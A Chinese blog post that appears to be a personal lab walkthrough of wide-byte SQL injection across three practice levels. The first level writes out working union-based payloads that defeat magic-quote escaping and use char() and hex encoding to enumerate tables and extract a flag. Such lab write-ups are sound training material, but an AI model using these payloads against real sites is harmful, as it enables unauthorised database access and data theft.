宽字节注入
靶场三关: 使用工具:Burpsuite
http://59.63.200.79:8812/New/WidecharBased/RankOne/sql-one/
http://59.63.200.79:8812/New/WidecharBased/RankTwo/sql-two/
http://59.63.200.79:8812/New/WidecharBased/RankThree/sql-three/
宽字节注入第一关
首先进入靶场,?id=1:
加单引号尝试是否报错有SQL注入可能:
发现有反斜线魔术引号存在,使用汉字将反斜线、引号搞掉:?id=1汗’ order by 3 —+:
搞掉并且闭合。
然后按步骤进行:
1、测字段数:order by ,测出字段数为三
2、Union select 1,2,3侧回显点为2,3
3、因为输出范围很大,所以使用group_concat()函数输出结果,测库名、表名、字段名、flag.
表名:?id=9.999汗’%20%20 union select 1,2,group_concat( table_name ) from information_schema.tables where table_schema=database() —+
字段名:?id=9.999汗’
union select 1,2,group_concat( column_name ) from
information_schema.columns where table_name=char(122,107,97,113) —+
此处使用char()函数绕过魔术引号
Flag:?id=9.999汗’%20%20 union select 1,2,group_concat( flag) from%20 zkaq— +
发现这里的表名没魔术引号
zKaQ:?id=9.999汗’%20%20 union select 1,2,group_concat(zKaQ) from%20 zkaq—+
宽字节注入第二关
和第一题一样的测试方法:
同样有魔术引号,但是是双引号
闭合方法:
其他步骤与第一题类似。
宽字节注入第三关
使用burpsuite 抓包:
引号检验测试发现这道题可能是post注入与魔术引号结合的问题。先闭合尝试
可以闭合
然后继续post注入的方法:
测出回显点为1和2.
获得表名。
16进制绕过魔术引号,获得字段名
获得flag.
做以记录,备忘
-------------------------------------------
个性签名:你有一个苹果,我有一个苹果,我们交换一下,一人还是只有一个苹果;你有一种思想,我有一种思想,我们交换一下,一个人就有两种思想。
如果觉得这篇文章对你有小小的帮助的话,记得在右下角点个“推荐”哦,博主在此感谢!
独学而无友,则孤陋而寡闻,开源、分享、白嫖!